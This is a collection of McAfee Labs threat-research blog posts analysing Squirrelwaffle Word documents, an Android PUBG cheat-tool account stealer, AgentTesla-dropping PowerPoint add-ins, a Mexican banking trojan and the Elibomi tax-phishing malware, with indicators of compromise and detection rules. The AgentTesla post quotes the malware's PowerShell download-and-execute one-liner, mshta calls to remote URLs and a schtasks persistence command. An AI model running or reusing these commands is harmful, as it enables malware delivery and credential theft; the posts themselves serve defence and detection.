ūüĒí
There are new articles available, click to refresh the page.
‚úá McAfee Blogs

The Newest Malicious Actor: ‚ÄúSquirrelwaffle‚ÄĚ Malicious Doc.

By: McAfee Labs ‚ÄĒ

Authored By Kiran Raj

Due to their widespread use, Office Documents are commonly used by Malicious actors as a way to distribute their malware. McAfee Labs have observed a new threat ‚ÄúSquirrelwaffle‚ÄĚ which is one such emerging malware that was observed using office documents in mid-September that infects systems with CobaltStrike.

In this Blog, we will have a quick look at the SquirrelWaffle malicious doc and understand the Initial infection vector.

Geolocation based stats of Squirrelwaffle malicious doc observed by McAfee from September 2021

 

Figure1- Geo based stats of SquirrelWaffle Malicious Doc
Figure1- Geo-based stats of SquirrelWaffle Malicious Doc

 

Infection Chain

  1. The initial attack vector is a phishing email with a malicious link hosting malicious docs
  2. On clicking the URL, a ZIP archived malicious doc is downloaded
  3. The malicious doc is weaponized with AutoOpen VBA function. Upon opening the malicious doc, it drops a VBS file containing obfuscated powershell
  4. The dropped VBS script is invoked via exe to download malicious DLLs
  5. Thedownloaded DLLs are executed via exe with an argument of export function ‚Äúldr‚ÄĚ
Figure-2: Infection Chain
Figure-2: Infection Chain

Malicious Doc Analysis

Here is how the face of the document looks when we open the document (figure 3). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

Figure-3: Image of Word Document Face
Figure-3: Image of Word Document Face

UserForms and VBA

The VBA Userform Label components present in the Word document (Figure-4) is used to store all the content required for the VBS file. In Figure-3, we can see the userform‚Äôs Labelbox ‚Äút2‚ÄĚ has VBS code in its caption.

Sub routine ‚ÄúeFile()‚ÄĚ retrieves the LabelBox captions and writes it to a C:\Programdata\Pin.vbs and executes it using cscript.exe

Cmd line: cmd /c cscript.exe C:\Programdata\Pin.vbs

Figure-4: Image of Userforms and VBA
Figure-4: Image of Userforms and VBA

VBS Script Analysis

The dropped VBS Script is obfuscated (Figure-5) and contains 5 URLs that host payloads. The script runs in a loop to download payloads using powershell and writes to C:\Programdata location in the format /www-[1-5].dll/. Once the payloads are downloaded, it is executed using rundll32.exe with export function name as parameter ‚Äúldr‚ÄĚ

Figure-5: Obfuscated VBS script
Figure-5: Obfuscated VBS script

De-obfuscated VBS script

VBS script after de-obfuscating (Figure-6)

Figure-6: De-obfuscated VBS script
Figure-6: De-obfuscated VBS script

MITRE ATT&CK

Different techniques & tactics are used by the malware and we mapped these with the MITRE ATT&CK platform.

  • Command and Scripting Interpreter (T-1059)

Malicious doc VBA drops and invokes VBS script.

CMD: cscript.exe C:\ProgramData\pin.vbs

 

  • Signed Binary Proxy Execution (T1218)

Rundll32.exe is used to execute the dropped payload

CMD: rundll32.exe C:\ProgramData\www1.dll,ldr

IOC

Type Value Scanner Detection Name
Main Word Document 195eba46828b9dfde47ffecdf61d9672db1a8bf13cd9ff03b71074db458b6cdf ENS,

WSS

 

W97M/Downloader.dsl

 

Downloaded DLL

 

85d0b72fe822fd6c22827b4da1917d2c1f2d9faa838e003e78e533384ea80939 ENS,

WSS

RDN/Squirrelwaffle
URLs to download DLL ·       priyacareers.com

·       bussiness-z.ml

·       cablingpoint.com

·       bonus.corporatebusinessmachines.co.in

·       perfectdemos.com

WebAdvisor Blocked

 

 

The post The Newest Malicious Actor: ‚ÄúSquirrelwaffle‚ÄĚ Malicious Doc. appeared first on McAfee Blogs.

‚úá McAfee Blogs

Social Network Account Stealers Hidden in Android Gaming Hacking Tool

By: McAfee Labs ‚ÄĒ

Authored by: Wenfeng Yu

McAfee Mobile Research team recently discovered a new piece of malware that specifically steals Google, Facebook, Twitter, Telegram and PUBG game accounts. This malware hides in a game assistant tool called ‚ÄúDesiEsp‚ÄĚ which is an assistant tool for PUBG game available on GitHub. Basically, cyber criminals added their own malicious code based on this DesiEsp open-source tool and published it on Telegram. PUBG game users are the main targets of this Android malware in all regions around the world but most infections are reported from the United States, India, and Saudi Arabia.¬†

What is an ESP hack? 

ESP Hacks, (short for Extra-Sensory Perception) are a type of hack that displays player information such as HP (Health Points), Name, Rank, Gun etc. It is like a permanent tuned-up KDR/HP Vision. ESP Hacks are not a single hack, but a whole category of hacks that function similarly and are often used together to make them more effective. 

How can you be affected by this malware? 

After investigation, it was found that this malware was spread in the channels related to PUBG game on the Telegram platform. Fortunately, this malware has not been found on Google Play. 

Figure‚ÄĮ1. Re-packaged hacking tool distributed in Telegram
Figure‚ÄĮ1. Re-packaged hacking tool distributed in Telegram

Main dropper behavior 

This malware will ask the user to allow superuser permission after running: 

Figure‚ÄĮ2.‚ÄĮInitial malware‚ÄĮrequesting root access.‚ÄĮ
Figure‚ÄĮ2.‚ÄĮInitial malware‚ÄĮrequesting root access.

If the user denies superuser request the malware will say that the application may not work: 

Figure‚ÄĮ3. Error‚ÄĮmessage‚ÄĮwhen root access is not provided‚ÄĮ
Figure‚ÄĮ3. Error‚ÄĮmessage‚ÄĮwhen root access is not provided

When it gains root permission, it will start two malicious actions. First, it will steal accounts by accessing the system account database and application database.  

Figure‚ÄĮ4. Get google account from android system account database.
Figure‚ÄĮ4. Get a Google account from the Android system account database.

Second, it¬†will install an additional payload¬†with package name¬†‚Äúcom.android.google.gsf.policy_sidecar_aps‚Ä̬†using¬†the ‚Äúpm install‚ÄĚ command.¬†The¬†payload¬†package will be in the assets¬†folder,¬†and it will disguise the file name as ‚Äú*.crt‚ÄĚ or ‚Äú*.mph‚ÄĚ.¬†

Figure‚ÄĮ5. Payload‚ÄĮdisguised‚ÄĮas a certificate file (crt‚ÄĮextension)‚ÄĮ
Figure‚ÄĮ5. Payload‚ÄĮdisguised‚ÄĮas a certificate file (crt‚ÄĮextension)

Stealing social and gaming accounts 

The dropped payload will not display icons and it does not operate directly on the screen of the user‚Äôs device. In the apps list of the system settings, it usually disguises the package name as something like ‚Äúcom.google.android.gsf‚ÄĚ to make users think it is a system service of Google. It runs in the background in the way of Accessibility Service. Accessibility Service is an auxiliary function provided by the Android system to help people with physical disabilities use mobile apps. It will connect to other apps like a plug-in and can it access the Activity, View, and other resources of the connected app.¬†

The malware will first try to get root permissions and IMEI (International Mobile Equipment Identity) code that later access the system account database. Of course, even if it does not have root access, it still has other ways to steal account information. Finally, it also will try to activate the device-admin to difficult its removal. 

Methods to steal account information 

The first method to steal account credentials that this malware uses is to monitor the login window and account input box text of the stolen app through the AccessibilityService interface to steal account information. The target apps include Facebook (com.facebook.kakana), Twitter (com.twitter.android), Google (com.google.android.gms) and PUBG MOBILE game (com.tencent.ig) 

The second method is to steal account information (including account number, password, key, and token) by accessing the account database of the system, the user config file, and the database of the monitored app. This part of the malicious code is the same as the parent sample above: 

Figure‚ÄĮ6. Malware accessing Facebook account information‚ÄĮusing root privileges‚ÄĮ
Figure‚ÄĮ6. Malware accessing Facebook account information‚ÄĮusing root privileges

Finally, the malware will report the stolen account information to the hacker’s server via HTTP.  

Gaming users infected worldwide 

PUBG games are popular all over the world, and users who use PUBG game assistant tools exist in all regions of the world. According to McAfee telemetry data, this malware and its variants affect a wide range of countries including the United States, India, and Saudi Arabia:  

Figure‚ÄĮ7. Top affected countries‚ÄĮinclude‚ÄĮUSA, India‚ÄĮand Saudi Arabia
Figure‚ÄĮ7. Top affected countries‚ÄĮinclude‚ÄĮUSA, India‚ÄĮ, and Saudi Arabia

Conclusion 

The online game market is revitalizing as represented by e-sports. We can play games anywhere in various environments such as mobiles, tablets, and PCs (personal computers). Some users will be looking for cheat tools and hacking techniques to play the game in a slightly advantageous way. Cheat tools are inevitably hosted on suspicious websites by their nature, and users looking for cheat tools must step into the suspicious websites. Attackers are also aware of the desires of such users and use these cheat tools to attack them. 

This malware is still constantly producing variants that use several ways to counter the detection of anti-virus software including packing, code obfuscation, and strings encryption, allowing itself to infect more game users. 

McAfee Mobile Security detects this threat as Android/Stealer and protects you from this malware attack. Use security software on your device. Game users should think twice before downloading and installing cheat tools, especially when they request Superuser or accessibility service permissions. 

Indicators of Compromise 

Dropper samples 

36d9e580c02a196e017410a6763f342eea745463cefd6f4f82317aeff2b7e1a5

fac1048fc80e88ff576ee829c2b05ff3420d6435280e0d6839f4e957c3fa3679

d054364014188016cf1fa8d4680f5c531e229c11acac04613769aa4384e2174b

3378e2dbbf3346e547dce4c043ee53dc956a3c07e895452f7e757445968e12ef

7e0ee9fdcad23051f048c0d0b57b661d58b59313f62c568aa472e70f68801417

6b14f00f258487851580e18704b5036e9d773358e75d01932ea9f63eb3d93973

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

ff186c0272202954def9989048e1956f6ade88eb76d0dc32a103f00ebfd8538e

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

3726dc9b457233f195f6ec677d8bc83531e8bc4a7976c5f7bb9b2cfdf597e86c

e815b1da7052669a7a82f50fabdeaece2b73dd7043e78d9850c0c7e95cc0013d

Payload samples 

8ef54eb7e1e81b7c5d1844f9e4c1ba8baf697c9f17f50bfa5bcc608382d43778

4e08e407c69ee472e9733bf908c438dbdaebc22895b70d33d55c4062fc018e26

6e7c48909b49c872a990b9a3a1d5235d81da7894bd21bc18caf791c3cb571b1c

9099908a1a45640555e70d4088ea95e81d72184bdaf6508266d0a83914cc2f06

ca29a2236370ed9979dc325ea4567a8b97b0ff98f7f56ea2e82a346182dfa3b8

d2985d3e613984b9b1cba038c6852810524d11dddab646a52bf7a0f6444a9845

ef69d1b0a4065a7d2cc050020b349f4ca03d3d365a47be70646fd3b6f9452bf6

06984d4249e3e6b82bfbd7da260251d99e9b5e6d293ecdc32fe47dd1cd840654

Domain 

hosting-b5476[.]gq 

The post Social Network Account Stealers Hidden in Android Gaming Hacking Tool appeared first on McAfee Blogs.

‚úá McAfee Blogs

Malicious PowerPoint Documents on the Rise

By: McAfee Labs ‚ÄĒ

Authored by Anuradha M

McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla which is a well-known password stealer.‚ÄĮThese spam emails purport to be related to financial transactions. ¬†

AgentTesla is a RAT (Remote Access Trojan) malware that¬†has¬†been active since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to‚ÄĮsteal user credentials and other information from victims through screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns.¬†

During Q2, 2021, we have seen an increase in PowerPoint malware. 

Figure 1. Trend of PPT malware over the first half of 2021
Figure 1. The trend of PPT malware over the first half of 2021

In this¬†campaign,¬†the¬†spam email¬†contains¬†an¬†attached¬†file with¬†a¬†.ppam¬†extension¬†which is a PowerPoint¬†file¬†containing¬†VBA¬†code. The¬†sentiment¬†used¬†was finance-related¬†themes such as:¬†‚ÄúNew PO300093 Order‚Ä̬†as shown in Figure¬†2. The attachment‚ÄĮfilename is¬†‚Äú300093.pdf.ppam‚ÄĚ.¬†

Figure 2. Spam Email

PPAM file: 

This file type was introduced in 2007 with the release of Microsoft Office 2007. It‚ÄĮis a‚ÄĮPowerPoint macro-enabled Open XML add-in file. It contains components that add additional functionality, including extra commands, custom macros, and new tools for extending default PowerPoint functions.¬†¬†

Since‚ÄĮPowerPoint supports ‚Äėadd-ins‚Äô developed by third parties to add new features,¬†attackers abuse this feature to¬†automatically execute macros.¬†

Technical Analysis: 

Once¬†the victim opens the‚ÄĮ‚Äú.ppam‚ÄĚ file, a security notice warning pop-up as shown in Figure 3 to alert the user about the presence of macro.

Figure 3. Warning when opening the attached PowerPoint file
Figure 3. Warning when opening the attached PowerPoint file

From Figure¬†4,¬†you can see¬†that the Add-in feature¬†of the¬†PowerPoint¬†can be identified from the¬†content‚ÄĮof‚ÄĮ[Content_Types].xml file which will¬†be¬†present inside the¬†ppam¬†file.¬†

Figure 4. Powerpoint add-in feature with macroEnabled
Figure 4. Powerpoint add-in feature with macroEnabled

 The PPAM file contains the following files and directories which can be seen upon extraction. 

  • _rels\.rels¬†
  • [Content_Types].xml¬†
  • ppt\rels\presentation.xml.rels¬†
  • ppt\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin‚ÄĮ‚Äď Malicious file¬†
  • ppt\presentation.xml¬†

Once the victim enables the macro, the add-in gets installed silently without user knowledge, which can be seen in Figure 5. On seeing that there is no content and no slide in the PowerPoint, the user will close the file but, in the backend, macro code gets executed to initiate the malicious activity. 

Figure 5. Installed Add-ins in the PowerPoint options
Figure 5. Installed Add-ins in the PowerPoint options

As you can see in Figure 6, the macro is executed within the add-in auto_open() event i.e.., macro is fired immediately after the presentation is opened and the add-in is loaded. 

Figure 6.VBA Code snippet with auto_open() event
Figure 6.VBA Code snippet with auto_open() event

The PowerPoint macro code on execution launches an URL by invoking mshta.exe (Microsoft HTML Application) which is¬†shown in¬†Figure 7.¬†The¬†mshta¬†process is launched by¬†Powerpoint¬†by calling the‚ÄĮCreateProcessA()¬†API.¬†

Below are the parameters passed to‚ÄĮCreateProcessA() API:¬†

kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D, 

Figure 7. VBA Code snippet containing mshta and url
Figure 7. VBA Code snippet containing mshta and url

Below‚ÄĮis¬†the¬†command¬†line parameter¬†of¬†mshta:¬†

mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh 

The URL¬†hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh¬†is redirected to¬†‚Äúhxxps://p8hj[.]blogspot[.]com/p/27.html‚Ä̬†but it didn‚Äôt get any response from ‚Äú27.html‚ÄĚ at the time of analysis.¬†

Later mshta.exe spawns powershell.exe as a child process. 

Below is the command line parameters of PowerShell: 

powershell.exe‚ÄĮ-‚ÄĮ‚ÄĚC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe‚Ä̬†i‚ÄôE‚Äôx(iwr(‚Äėhxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‚Äė) -useB);i‚ÄôE‚Äôx(iwr(‚Äėhxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‚Äė) -useB);i‚ÄôE‚Äôx(iwr(‚Äėhxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‚Äė) -useB);¬†

PowerShell downloads and executed script files from the above-mentioned URLs.  

The below¬†Figure¬†8¬†shows the content of‚ÄĮthe¬†first¬†url¬†‚Äst‚Äúhxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‚ÄĚ:¬†

Figure 8. Binary file content
Figure 8. Binary file content

There are two binary files stored in two huge arrays inside each downloaded PowerShell file.‚ÄĮThe first file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla.¬†PowerShell fetches the AgentTesla payload from the URLs mentioned in the command line, decodes it, and launches MSBuild.exe¬†to¬†inject¬†the payload within itself.¬†

Schedule Tasks: 

To achieve persistence,¬†it¬†creates a¬†scheduled task in¬†‚ÄúTask Scheduler‚Ä̬†and drops a task file under¬†C:\windows\system32\SECOTAKSA¬†to make the entire campaign work effectively.¬†¬†¬†

Figure 9. Code snippet to create a new schedule task
Figure 9. Code snippet to create a new scheduled task

The new task name is¬†‚ÄúSECOTAKSA‚ÄĚ. Its action is to execute the command¬†‚Äúmshta¬†hxxp://¬†//1230948%[email protected]/p/27.html‚Ä̬†and it‚Äôs called every 80 minutes.¬†¬†

Below is the command line parameters of schtasks: 

schtasks.exe‚ÄĮ-‚ÄĮ‚ÄúC:\Windows\System32\schtasks.exe‚ÄĚ /create /sc¬†MINUTE /mo¬†80 /tn¬†‚Äú‚ÄĚSECOTAKSA‚ÄĚ‚ÄĚ /F /tr ‚Äú‚ÄĚ\‚ÄĚ‚ÄĚMsHtA‚ÄĚ‚ÄĚ\‚ÄĚ‚ÄĚhxxp://1230948%[email protected]/p/27.html\‚Äú‚Ä̬†

Infection Chain: 

Figure 10. Infection Chain
Figure 10. Infection Chain

Process Tree: 

Figure 11. Process Tree
Figure 11. Process Tree

Mitigation: 

McAfee’s Endpoint Security (ENS) and Windows Systems Security (WSS) product have  DAT coverage for this variant of malware. 

This malicious PPAM document with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as ‚ÄúW97M/Downloader.dkw‚ÄĚ.¬†¬†

The PPAM document is also blocked by the AMSI feature in ENS as AMSI-FKN! 

Additionally, the Exploit Prevention feature in McAfee’s Endpoint Security product blocks the infection chain of this malware by adding the below expert rule so as to protect our customers from this malicious attack. 

Expert Rule authored based on the below infection chain: 

POWERPNT.EXE ‚Äď> mshta.exe¬†¬†

Expert Rule: 

Rule { 

  Process { 

¬†¬†¬† Include OBJECT_NAME¬†{ -v ‚Äúpowerpnt.exe‚ÄĚ }¬†

  } 

  Target { 

    Match PROCESS { 

¬†¬†¬†¬†¬†¬† Include OBJECT_NAME¬†{ -v ‚Äúmshta.exe‚ÄĚ }¬†

¬†¬†¬†¬†¬†¬† Include PROCESS_CMD_LINE¬†{ -v ‚Äú**http**‚ÄĚ }¬†

¬†¬†¬†¬†¬†¬† Include -access ‚ÄúCREATE‚Ä̬†

    } 

  } 

} 

IOCs 

URLs: 

hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh 

hxxp://¬†//1230948%[email protected]/p/27.html¬†

hxxps://p8hj[.]blogspot[.]com/p/27.html 

hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt  

hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt  

hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt 

EML files: 

72e910652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3 

0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0 

fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253 

38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb  

PPAM files: 

fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 

6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3 

9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b 

ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd 

c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d 

Extracted AgentTesla files: 

71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99 

90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371 

The post Malicious PowerPoint Documents on the Rise appeared first on McAfee Blogs.

‚úá McAfee Blogs

Android malware distributed in Mexico uses Covid-19 to steal financial credentials

By: McAfee Labs ‚ÄĒ

Authored by Fernando Ruiz

McAfee Mobile Malware Research Team has identified malware targeting Mexico. It poses as a security banking tool or as a bank application designed to report an out-of-service ATM. In both instances, the malware relies on the sense of urgency created by tools designed to prevent fraud to encourage targets to use them. This malware can steal authentication factors crucial to accessing accounts from their victims on the targeted financial institutions in Mexico. 

McAfee Mobile Security is identifying this threat as Android/Banker.BT along with its variants. 

How does this malware spread? 

The malware is distributed by a malicious phishing page that provides actual banking security tips (copied from the original bank site) and recommends downloading the malicious apps as a security tool or as an app to report out-of-service ATM. It’s very likely that a smishing campaign is associated with this threat as part of the distribution method or it’s also possible that victims may be contacted directly by scam phone calls made by the criminals, a common occurrence in Latin America. Fortunately, this threat has not been identified on Google Play yet. 

Here’s how to protect yourself 

During the pandemic,¬†banks adopted¬†new ways to interact with their clients.¬†These rapid changes meant customers were¬†more willing to accept new procedures and to install new apps as part of the ‚Äėnew normal‚Äô to interact remotely. Seeing¬†this,¬†cyber-criminals¬†introduced¬†new scams and phishing attacks that¬†looked¬†more credible than¬†those¬†in the¬†past¬†leaving customers more susceptible.¬†

Fortunately, McAfee Mobile Security is able to detect this new threat as Android/Banker.BT. To protect yourself from this and similar threats: 

  • Employ security software on your mobile devices¬†¬†
  • Think twice before downloading and installing suspicious apps especially if they request SMS or Notification listener permissions.¬†
  • Use official app¬†stores¬†however¬†never trust them blindly¬†as¬†malware may be distributed on¬†these¬†stores too so check for permissions,¬†read reviews and seek out¬†developer information if available.¬†
  • Use¬†token based second authentication factor apps (hardware or software) over SMS message¬†authentication¬†

Interested in the details? Here’s a deep dive on this malware 

Figure 1- Phishing malware distribution site that provides security tips
Figure 1- Phishing malware distribution site that provides security tips

Behavior: Carefully guiding the victim to provide their credentials 

Once the malicious app is installed and started, the first activity shows a message in Spanish that explains the fake purpose of the app: 

‚Äď Fake Tool to report fraudulent movements that creates a sense of urgency:¬†

Figure 2- Malicious app introduction that try to lure users to provide their bank credentials
Figure 2- Malicious app introduction that tries to lure users to provide their bank credentials\

‚ÄúThe ‚Äėbank name has created a tool to allow you to block any suspicious movement. All operations listed on the app are still pending. If you fail to block the unrecognized movements in less than 24 hours, then they will charge your account automatically.¬†

At the end of the blocking¬†process,¬†you will receive an SMS message with the details of the blocked operations.‚Ä̬†

‚Äď In the case of the Fake ATM failure tool to request a new credit card under the pandemic context, there is a similar text that lures users into a false sense of security:¬†

Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as pretext to lure users into provide their bank credentials
Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as a pretext to lure users into providing their bank credentials

‚ÄúAs a Covid-19 sanitary measure, this new option has been created. You will receive an ID via SMS for your report and then you can request your new card at any branch or receive it at your registered home address for free. Alert! We will never request your sensitive data such as NIP or CVV.‚ÄĚThis gives credibility to the app since it‚Äôs saying it will not ask for some sensitive data; however, it will ask for web banking credentials.¬†

If the victims tap on ‚ÄúIngresar‚ÄĚ (‚Äúaccess‚ÄĚ) then the banking trojan asks for SMS permissions and launch activity to enter the user id or account number and then the password. In the background, the password or ‚Äėclave‚Äô is transmitted to the criminal‚Äôs server without verifying if the provided credentials are valid or being redirected to the original bank site as many others banking trojan does.¬†

Figure 4- snippet of user entered password exfiltration
Figure 4- snippet of user-entered password exfiltration

Finally, a fixed fake list of transactions is displayed so the user can take the action of blocking them as part of the scam however at this point the crooks already have the victim’s login data and access to their device SMS messages so they are capable to steal the second authentication factor. 

Figure 5- Fake list of fraudulent transactions
Figure 5- Fake list of fraudulent transactions

In case of the fake tool app to request a new¬†card,¬†the app shows a message that says at the end ‚ÄúWe have created this Covid-19 sanitary measure and we invite you to visit our anti-fraud tips where you will learn how to protect your account‚ÄĚ.¬†¬†

Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.
Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.

In the background the malware contacts the command-and-control server that is hosted in the same domain used for distribution and it sends the user credentials and all users SMS messages over HTTPS as query parameters (as part of the URL) which can lead to the sensitive data to be stored in web server logs and not only the final attacker destination. Usually, malware of this type has poor handling of the stolen data, therefore, it’s not surprising if this information is leaked or compromised by other criminal groups which makes this type of threat even riskier for the victims. Actually, in figure 8 there is a partial screenshot of an exposed page that contains the structure to display the stolen data. 

Figure 7 - Malicious method related to exfiltration of all SMS Messages from the victim's device.
Figure 7 ‚Äď Malicious method related to exfiltration of all SMS Messages from the victim‚Äôs device.

Table Headers: Date, From, Body Message, User, Password, Id: 

Figure 8 ‚Äď Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.
Figure 8 ‚Äď Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.

This mobile banker is interesting due it’s a scam developed from scratch that is not linked to well-known and more powerful banking trojan frameworks that are commercialized in the black market between cyber-criminals. This is clearly a local development that may evolve in the future in a more serious threat since the decompiled code shows accessibility services class is present but not implemented which leads to thinking that the malware authors are trying to emulate the malicious behavior of more mature malware families. From the self-evasion perspective, the malware does not offer any technique to avoid analysis, detection, or decompiling that is signal it’s in an early stage of development. 

IoC 

SHA256: 

  • 84df7daec93348f66608d6fe2ce262b7130520846da302240665b3b63b9464f9¬†
  • b946bc9647ccc3e5cfd88ab41887e58dc40850a6907df6bb81d18ef0cb340997¬†
  • 3f773e93991c0a4dd3b8af17f653a62f167ebad218ad962b9a4780cb99b1b7e2¬†
  • 1deedb90ff3756996f14ddf93800cd8c41a927c36ac15fcd186f8952ffd07ee0¬†

Domains: 

  • https[://]appmx2021.com¬†

The post Android malware distributed in Mexico uses Covid-19 to steal financial credentials appeared first on McAfee Blogs.

‚úá McAfee Blogs

Phishing Android Malware Targets Taxpayers in India

By: McAfee Labs ‚ÄĒ

Authored by ChanUng Pak  

McAfee’s Mobile Research team recently found a new Android malware, Elibomi, targeting taxpayers in India. The malware steals sensitive financial and private information via phishing by pretending to be a tax-filing application. We have identified two main campaigns that used different fake app themes to lure in taxpayers. The first campaign from November 2020 pretended to be a fake IT certificate application while the second campaign, first seen in May 2021, used the fake tax-filing theme. With this discovery, the McAfee Mobile Research team has been able to update McAfee Mobile Security so that it detects this threat as Android/Elibomi and alerts mobile users if this malware is present in their devices. 

During our investigation, we found that in the latest campaign the malware is delivered using an SMS text phishing attack. The SMS message pretends to be from the Income Tax Department in India and uses the name of the targeted user to make the SMS phishing attack more credible and increase the chances of infecting the device. The fake app used in this campaign is designed to capture and steal the victim’s sensitive personal and financial information by tricking the user into believing that it is a legitimate tax-filing app. 

We also found that Elibomi exposes the stolen sensitive information to anyone on the Internet. The stolen data includes e-mail addresses, phone numbers, SMS/MMS messages among other financial and personal identifiable information. McAfee has reported the servers exposing the data and at the time of publication of this blog the exposed information is no longer available. 

Pretending to be an app from the Income Tax Department in India 

The latest and most recent Elibomi campaign uses a fake tax-filing app theme and pretends to be from the Income Tax Department from the Indian government. They even use the original logo to trick the users into installing the app. The package names (unique app identifiers) of these fake apps consist of a random word + another random string + imobile (e.g. ‚Äúdirect.uujgiq.imobile‚ÄĚ and ‚Äúolayan.aznohomqlq.imobile‚ÄĚ). As mentioned before this campaign has been active since at least May 2021.¬†

Figure 1. Fake iMobile app pretending to be from the Income Tax Department and asking SMS permissions 

After all the required permissions are granted, Elibomi attempts to collect personal information like e-mail address, phone number and SMS/MMS messages stored in the infected device: 

Figure 2. Elibomi stealing SMS messages 

Prevention and defense 

Here are our recommendations to avoid being affected by this and other Android threats that use social engineering to convince users to install malware disguised as legitimate apps: 

  • Have a reliable and updated security application like McAfee Mobile Security installed in your mobile devices to protect you against this and other malicious applications.¬†
  • Do not click on suspicious links received from text messages or social media, particularly from unknown sources. Always double check by other means if a contact that sends a link without context was really sent by that person because it could lead to the download of a malicious application.¬†

Conclusion 

Android/Elibomi¬†is just another example of¬†the effectiveness of personalized phishing attacks to trick users into installing a malicious application even when Android itself prevents that from happening. By pretending to be an ‚ÄúIncome Tax‚ÄĚ app from the Indian government, Android/Elibomi¬†has been able to gather very sensitive and private personal and financial information from affected users which could be used to perform identify and/or financial fraud. Even more worryingly, the information was not only in cybercriminals‚Äô¬†hands,¬†but it was also unexpectedly exposed on the Internet which could have a greater impact¬†on¬†the victims. As long as social engineering attacks remain¬†effective,¬†we expect that cybercriminals will continue to evolve their campaigns to trick even more users with different fake apps including ones related¬†to financial and tax services.¬†

McAfee Mobile Security detects this threat as Android/Elibomi and alerts mobile users if it is present. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com 

For those interested in a deeper dive into our research… 

Distribution method and stolen data exposed on the Internet 

During our investigation, we found the main distribution method of the latest campaign in one of the stolen SMS messages exposed in one of the C2 servers. The SMS body field in the screenshot below shows the Smishing attack used to deliver the malware. Interestingly, the message includes the victim’s name in order to make the message more personal and therefore more credible. It also urges the user to click on a suspicious link with the excuse of checking an urgent update regarding the victim’s Income Tax return: 

Figure 3. Exposed information includes the SMS phishing attack used to originally deliver the malware 

Elibomi not only exposes stolen SMS messages, but it also captures and exposes the list of all accounts logged in the infected devices: 

Figure 4. Example of account information exposed in one of the C2 servers

If the targeted user clicks on the link in the text message, a phishing page will be shown pretending to be from the Income Tax Department from the Indian government which addresses the user by its name to make the phishing attack more credible: 

Figure 5. Fake e-Filing phishing page pretending to be from the Income Tax Department in India 

Each¬†targeted user¬†has a different¬†application.¬†For¬†example¬†in the screenshot below we have the app¬†‚Äúcisco.uemoveqlg.imobile‚Ä̬†on the left and¬†‚Äúkomatsu.mjeqls.imobile‚Ä̬†on the right:¬†

Figure 6. Different malicious applications for different users

During our investigation, we found that there are several variants of Elibomi for the same iMobile fake Income tax app. For example, some iMobile apps only have the login page while in others have the option to ‚Äúregister‚ÄĚ and request a fake tax refund:¬†

Figure 7. Fake iMobile screens designed to capture personal and financial information 

The sensitive financial information provided by the tricked user is also exposed on the Internet: 

Figure 8. Example of exposed financial information stolen by Elibomi using a fake tax filling app 

Related Fake IT Certificate applications 

The first¬†Elibomi¬†campaign pretended to be a fake ‚ÄúIT Certificate‚ÄĚ app¬†was found to be¬†distributed¬†in¬†November 2020.¬†¬†In the following figure we can see the similarities in the code between the two malware campaigns:¬†

Figure 9. Code similarity between Elibomi campaigns 

